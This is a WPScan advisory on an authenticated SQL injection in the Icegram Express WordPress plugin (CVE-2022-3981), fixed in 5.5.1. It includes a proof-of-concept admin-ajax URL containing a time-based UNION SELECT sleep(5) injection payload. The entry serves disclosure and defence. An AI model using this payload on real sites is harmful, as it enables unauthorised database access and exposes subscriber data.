WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Icegram Express < 5.5.1 - Subscriber+ SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated users, such as subscriber

Proof of Concept

Open the below URL when logged in as a subscriber and notice the 5s delay

https://example.com/wp-admin/admin-ajax.php?action=count_contacts_by_list&get_count=yes&list_id=1&conditions[]=3&status[]=\&status[]=)%20%20UNION%20SELECT%20sleep(5)%20UNION%20SELECT%20COUNT(DISTINCT%20subscribers.id)%20FROM%20wp_ig_contacts%20AS%20subscribers%20LEFT%20JOIN%20wp_ig_lists_contacts%20AS%20lists_subscribers%20ON%20subscribers.id%20=%20lists_subscribers.contact_id%20WHERE%201=1%20AND%20lists_subscribers.status%20IN(1)%20--%20g

Affects Plugins

email-subscribers
Fixed in version 5.5.1

References

CVE
CVE-2022-3981

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Krzysztof Zajac

Submitter

Krzysztof Zajac

Submitter website
https://kazet.cc/
Submitter twitter
https://twitter.com/kazet1234
Verified

Yes

WPVDB ID
78054d08-0227-426c-903d-d146e0919028

Timeline

Publicly Published

2022-11-21 (about 2 months ago)

Added

2022-11-21 (about 2 months ago)

Last Updated

2022-12-01 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin